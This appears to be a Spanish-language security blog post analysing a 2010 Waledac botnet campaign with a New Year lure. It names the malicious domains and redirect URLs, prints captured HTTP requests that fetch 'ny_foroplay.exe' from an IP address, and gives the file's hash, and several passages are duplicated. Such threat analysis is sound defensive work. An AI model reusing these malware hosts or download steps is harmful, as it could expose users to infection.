Waledac vuelve con otra estrategia de ataque
Luego de un largo periodo de inactividad, la botnet formada por waledac vuelve a desplegar una estrategia de infección utilizando el patrón que lo caracteriza: Ingeniería Social, que en esta oportunidad aprovecha como cobertura el comienzo del nuevo año.
Las últimas campañas de waledac datan de mediados de año cuando la estrategia de propagación utilizada simulaba ser un video sobre el día de la independencia en EE.UU, alojado en YouTube. De hecho, la actividad más importante durante este año se produjo durante el primer cuatrimestre.
A continuación podemos observar capturas que describen la línea de tiempo de waledac en torno a su actividad durante el 2009.
A continuación podemos observar capturas que describen la línea de tiempo de waledac en torno a su actividad durante el 2009.
Sin embargo, quienes se encuentran detrás de waledac nunca se detuvieron y los dominios utilizados recientemente poseen fecha de registro durante todo el periodo de supuesta inactividad.
Cada página utilizada para la propagación posee un script ofuscado con instrucciones para ser ejecutadas de forma automática en el equipo víctima. De esta manera, se explota una debilidad y automáticamente se descarga y ejecuta el malware, convirtiendo el equipo en un nodo más de la botnet, para continuar con sus actividades fraudulentas. A continuación vemos una captura del script.
Dentro del script se encuentra la referencia hacia el archivo counter.php que aloja otro script y desde el cual salta hacia http://diokxbgrqkgg.com/ld/trest1/ y este a http://diokxbgrqkgg.com/nte/trest1.py, en donde se encuentra otro script malicioso.
GET /counter.php HTTP/1.1
Host: aju.nonprobs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://aju.nonprobs.com/2010.html
En esta instancia, descarga y ejecuta un archivo llamado "ny_foroplay.exe" (MD5: df2d6f835ad6e5276b1b1ffe73170070) desde la dirección IP 95.169.190.208 alojada en Rusia.
Cabe aclarar que este malware posee un muy bajo índice de detección, siendo detectado hasta el momento sólo por 6 compañías antivirus de un total de 40. Reporte de VT.
Cabe aclarar que este malware posee un muy bajo índice de detección, siendo detectado hasta el momento sólo por 6 compañías antivirus de un total de 40. Reporte de VT.
GET /pr/pic/ny_foroplay.exe HTTP/1.0
Host: 95.169.190.208
HTTP/1.0 200 OK
Age: 1542
Date: Fri, 01 Jan 2010 19:22:58 GMT
Content-Length: 416256
Content-Type: application/octet-stream
Server: nginx/0.8.15
Last-Modified: Fri, 01 Jan 2010 19:22:58 GMT
MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
$.........y.=u..=u..=u...u..u..
Host: 95.169.190.208
HTTP/1.0 200 OK
Age: 1542
Date: Fri, 01 Jan 2010 19:22:58 GMT
Content-Length: 416256
Content-Type: application/octet-stream
Server: nginx/0.8.15
Last-Modified: Fri, 01 Jan 2010 19:22:58 GMT
MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
$.........y.=u..=u..=u...u..
Información relacionada
Waledac/Storm. Pasado y presente de una amenaza latente
Estrategia BlackHat SEO propuesta por Waledac
Waledac. Seguimiento detallado de una amenaza latente
Más Waledac en acción ¿Puedes adivinar cuánto te
Waledac más amoroso que nunca
Waledac e Ingeniería Social en San Valentín